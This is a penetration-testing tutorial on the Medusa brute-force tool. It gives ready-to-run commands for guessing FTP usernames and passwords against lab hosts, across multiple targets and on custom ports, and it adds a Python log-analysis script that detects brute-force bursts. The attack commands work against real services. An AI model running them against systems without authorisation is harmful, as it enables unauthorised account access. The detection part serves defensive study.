Medusa – A Brute Forcing Tool

Hajqnaqj



Hey Folks, in this tutorial we are going to talk about another brute-forcing tool called “Medusa”. Medusa is a speedy, parallel, and modular login brute-forcer. Its goal is to support as many services that allow remote authentication as possible. The key features of the tool are listed below.

Features
  • Thread-based parallel testing. Brute-force testing can be performed against multiple hosts, users or passwords concurrently.
  • Flexible user input. Target information (host/user/password) can be specified in a variety of ways. For example, each item can be either a single entry or a file containing multiple entries. Additionally, a combination file format allows the user to refine their target listing.
  • Modular design. Each service module exists as an independent .mod file. This means that no modifications are necessary to the core application in order to extend the supported list of services for brute-forcing.

Let's take a look 🙂 !!

Installation

The tool comes pre-installed in Kali Linux, but you can install it with the following command if you are using any other operating system. If you use an Android application, the “pkg” command is also given below.

apt-get install medusa
or
pkg install medusa


If you get stuck somewhere, you can use the following command to see the tool's help.

medusa -h


You can see all the modules available in this tool with the following command.

medusa -d


Guess the Username and Password

As mentioned, Medusa is a brute-force tool used to gain unauthorized access to services or websites by guessing the correct password. For demonstration purposes we have configured the FTP service on a virtual machine, running on port 21. In this case we know neither the username nor the password, yet we will try to find the correct credentials. If you do not have a dictionary, you can take help from this article. You just need to replace the file locations and the host address and execute the command. As you can see, the valid username and password are found after executing the command.

Usage 🙂 !! medusa -h < host address > -U < username list > -P < password list > -M < protocol >

medusa -h 192.168.1.11 -U username.txt -P password.txt -M ftp


Guessing Password for Specific User

If you already have the user details, you do not need to make a username word list; you can use the following command instead.

Usage 🙂 !! medusa -h < host address > -u < username > -P < password list > -M < protocol >.

medusa -h 192.168.1.11 -u shubham -P password.txt -M ftp


Guessing Username

Similarly, although this happens rarely, if you have a password for login but not a username, you can add the argument “-p” so that the password remains static.

Usage 🙂 !! medusa -h < host address > -U < username list > -p < password > -M < protocol >.

medusa -h 192.168.1.11 -U username.txt -p neon -M ftp
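
Seen from the FTP server's side, the guessing modes above leave a recognisable trail of failed logins. The following is an added example, not part of the original tutorial: it assumes the server writes vsftpd-style login lines, and the sample log, the `detect` function and its window and threshold values are constructed for illustration.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample in vsftpd's login-log style (an assumed server; not from the page).
SAMPLE_LOG = '''\
Tue Mar  5 10:00:01 2024 [pid 2101] [shubham] FAIL LOGIN: Client "192.168.1.50"
Tue Mar  5 10:00:02 2024 [pid 2102] [shubham] FAIL LOGIN: Client "192.168.1.50"
Tue Mar  5 10:00:02 2024 [pid 2103] [admin] FAIL LOGIN: Client "192.168.1.51"
Tue Mar  5 10:00:03 2024 [pid 2104] [shubham] FAIL LOGIN: Client "192.168.1.50"
Tue Mar  5 10:00:03 2024 [pid 2105] [root] FAIL LOGIN: Client "192.168.1.51"
Tue Mar  5 10:00:04 2024 [pid 2106] [shubham] FAIL LOGIN: Client "192.168.1.50"
Tue Mar  5 10:00:04 2024 [pid 2107] [guest] FAIL LOGIN: Client "192.168.1.51"
Tue Mar  5 10:00:05 2024 [pid 2108] [test] FAIL LOGIN: Client "192.168.1.51"
Tue Mar  5 10:00:06 2024 [pid 2109] [shubham] OK LOGIN: Client "192.168.1.50"
Tue Mar  5 10:07:10 2024 [pid 2140] [alice] FAIL LOGIN: Client "192.168.1.60"
Tue Mar  5 10:07:25 2024 [pid 2141] [alice] OK LOGIN: Client "192.168.1.60"
'''

LINE_RE = re.compile(
    r'^(?P<ts>\w{3} \w{3} [ \d]\d [\d:]{8} \d{4}) \[pid \d+\] '
    r'\[(?P<user>[^\]]*)\] (?P<res>OK|FAIL) LOGIN: Client "(?P<ip>[^"]+)"')

def detect(log_text, window=timedelta(seconds=60), threshold=4):
    """Return {client_ip: {"pattern": str, "logins_after_burst": [users]}}."""
    recent = defaultdict(list)  # ip -> [(time, user)] failures inside the window
    alerts = {}
    for m in filter(None, map(LINE_RE.match, log_text.splitlines())):
        ts = datetime.strptime(m["ts"], "%a %b %d %H:%M:%S %Y")
        ip, user = m["ip"], m["user"]
        recent[ip] = [(t, u) for t, u in recent[ip] if ts - t <= window]
        if m["res"] == "FAIL":
            recent[ip].append((ts, user))
        if len(recent[ip]) < threshold:
            continue  # too few failures in the window to call it guessing
        targets = {u for _, u in recent[ip]}
        alert = alerts.setdefault(ip, {"pattern": "", "logins_after_burst": []})
        # One account with many passwords, or many accounts tried from one client
        alert["pattern"] = "one-account" if len(targets) == 1 else "many-accounts"
        if m["res"] == "OK":
            alert["logins_after_burst"].append(user)  # treat as a guessed credential
    return alerts

if __name__ == "__main__":
    for ip, alert in detect(SAMPLE_LOG).items():
        print(ip, alert)
```

A successful login that follows a burst is the case to act on first: reset that account's password and review what the session did. The single mistyped password from 192.168.1.60 stays below the threshold and raises nothing.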


Verbose Mode

As we know, the tool provides a verbose mode to see additional details of the currently running process.

medusa -h 192.168.1.11 -U username.txt -P password.txt -M ftp -v 6


Combo

The combo file can be specified using the “-C” option. The file should contain one entry per line and have the values colon separated in the format host:user:password. If any of the three fields are left empty, the respective information should be provided either as a global value or as a list in a file. Medusa will perform a basic parameter check based on the contents of the first line in the file. The following combinations are possible in the combo file:

  • host:username:password
  • host:username:
  • host::
  • :username:password
  • :username:
  • ::password
  • host::password

Done 🙂 !! As you can see it has found valid username and passwords of three different -2 hosts.

medusa -M ftp -C uplist.txt


Multiple Hosts

If we want to perform a brute-force attack on multiple hosts at the same time, we use the following command, in which the “-H” argument is added to brute force multiple hosts.

medusa -H hosts.txt -U username.txt -P password.txt -M ftp -v 6


Brute force on Forward Port

If the port has been changed by the administrator, we can add the “-n” argument to the command to perform the brute-force attack on a specific port or service.

medusa -h 192.168.1.9 -U username.txt -P password.txt -M ftp -n 2121


Save Output

If you want to save your results as a TXT file, you can add the “-O” argument to the command to save the entire results.

medusa -h 192.168.1.11 -U username.txt -P password.txt -M ftp -O res.txt


Stop on Success

The following command is used to stop the brute force attack after obtaining the first correct username and password.

medusa -h 192.168.1.11 -U username.txt -P password.txt -M ftp -f


Credit : http://www.foofus.net

About the Author: Shubham Goyal, Certified Ethical Hacker, information security analyst, penetration tester and researcher. Can be contacted on LinkedIn.
 
